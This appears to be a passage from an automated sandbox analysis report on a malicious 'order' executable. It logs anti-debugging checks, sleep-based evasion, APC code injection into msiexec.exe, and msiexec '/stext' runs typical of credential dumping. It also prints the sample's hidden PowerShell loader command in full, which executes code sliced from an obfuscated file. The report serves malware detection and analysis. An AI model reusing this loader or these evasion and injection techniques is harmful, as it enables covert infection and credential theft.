              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6743Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2881Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 9.2 %
              Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.3 %
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2076Thread sleep time: -6456360425798339s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 828Thread sleep count: 235 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 828Thread sleep time: -117500s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 736Thread sleep count: 942 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 736Thread sleep time: -2826000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 736Thread sleep count: 8556 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 736Thread sleep time: -25668000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeCode function: 0_2_0040689E FindFirstFileW,FindClose,0_2_0040689E
              Source: C:\Users\user\Desktop\order CF08093-24.exeCode function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4D
              Source: C:\Users\user\Desktop\order CF08093-24.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_235F10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_235F10F1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_235F6580 FindFirstFileExA,6_2_235F6580
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040AE51 FindFirstFileW,FindNextFileW,10_2_0040AE51
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407EF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407898
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00418981 memset,GetSystemInfo,10_2_00418981
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: powershell.exe, 00000002.00000002.3110901476.00000000054C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\]q
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007ABA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
              Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
              Source: powershell.exe, 00000002.00000002.3110901476.00000000054C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\]q
              Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
              Source: powershell.exe, 00000002.00000002.3110396387.0000000002CB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VVpnClient.psMSFT_NetEventVmNetworkAdatper.format.ps1xml
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000002.00000002.3110901476.00000000054C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\]q
              Source: powershell.exe, 00000002.00000002.3110396387.0000000002CB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PS_VpnSeMSFT_NetEventVmNetworkAdatper.cdxml
              Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
              Source: C:\Users\user\Desktop\order CF08093-24.exeAPI call chain: ExitProcess graph end nodegraph_0-3714
              Source: C:\Users\user\Desktop\order CF08093-24.exeAPI call chain: ExitProcess graph end nodegraph_0-3722
              Source: C:\Windows\SysWOW64\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_11-34012
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_235F8EC8 LdrInitializeThunk,6_2_235F8EC8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_235F2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_235F2639
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,10_2_004044A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_235F4AB4 mov eax, dword ptr fs:[00000030h]6_2_235F4AB4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_235F724E GetProcessHeap,6_2_235F724E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_235F2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_235F2B1C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_235F2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_235F2639
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_235F60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_235F60E2

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Early bird code injection technique detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3C60000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\aczzpbalucdoyblxcfryerxbbswqyinsk"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dwmsp"Jump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$amanuensissers25=gc -raw 'c:\users\user\appdata\local\temp\blankbook85\patchworkenes\resprmiernes\lynlaases\servicerende.gal55';$magnoliaceae=$amanuensissers25.substring(71792,3);.$magnoliaceae($amanuensissers25)
              Source: C:\Users\user\Desktop\order CF08093-24.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$amanuensissers25=gc -raw 'c:\users\user\appdata\local\temp\blankbook85\patchworkenes\resprmiernes\lynlaases\servicerende.gal55';$magnoliaceae=$amanuensissers25.substring(71792,3);.$magnoliaceae($amanuensissers25)Jump to behavior
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager04\!
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager04\*b
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007ABA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager04\
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager04\:
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007ABA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager.
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerx
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager04\t
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.4475133406.0000000007B39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager04\*
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager04\i
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager04\10
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager04\ca
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007ABA000.00000004.00000020.00020000.00000000.sdmp, logs.dat.6.drBinary or memory string: [Program Manager]
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager04\M
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_235F2933 cpuid 6_2_235F2933
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
